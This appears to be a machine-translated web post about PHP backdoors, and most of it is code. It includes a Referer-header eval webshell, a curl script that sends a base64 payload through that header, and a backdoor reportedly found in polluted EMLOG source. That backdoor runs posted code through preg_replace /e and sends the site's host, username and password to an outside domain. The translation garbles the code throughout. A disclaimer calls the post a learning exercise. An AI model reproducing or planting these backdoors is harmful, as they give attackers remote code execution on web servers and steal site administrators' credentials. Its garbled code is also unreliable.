local test results below.

this program is only as a learning effect, please do not do bad things.

code is as follows:


<? PHP
//1. PHP
header (' the content-type: text/HTML; charset=utf-8 ');
parse_str ($_SERVER [' HTTP_REFERER '], $a);
the if (reset ($a)=='10' & & count ($a)==9) {
eval (base64_decode (str_replace (" ", "+", the implode (array_slice ($a, 6)))));
} <? PHP
//2. PHP
header (' the content-type: text/HTML; charset=utf-8 ');
//
$code to execute code=<<<CODE
a phpinfo ();
CODE;

$//base64 coding code=base64_encode ($code);
//construct referer string
$referer="10 & a=b=ab&c=34 & d=re&e=32 & f=km&g={$code} & h=& I=";

$url url//the back door='http://localhost/test1/1.php';
$ch=curl_init ();
$options=array (
CURLOPT_URL=>$url,
CURLOPT_HEADER=>FALSE,
CURLOPT_RETURNTRANSFER=>TRUE,
CURLOPT_REFERER=>$referer
);
curl_setopt_array ($ch, $options);
echo the curl_exec ($ch);

EMLOG source polluted recently, the back door of the appearance of some users to download the following code

code is as follows:


the if (isset ($_GET []" RSDSRV ")) {
the if ($_GET [] "RSDSRV"=="20 c6868249a44b0ab92146eac6211aeefcf68eec") {
@ preg_replace ("//e ", $_POST [' IN_EMLOG], "Unauthorization");

}}
file_get_contents (" http://, a domain name/? Url="base64_encode ($_SERVER [' HTTP_HOST] $_SERVER [' PHP_SELF '])." & username="base64_encode ($username.)" & password="base64_encode ($password));


This concludes the body part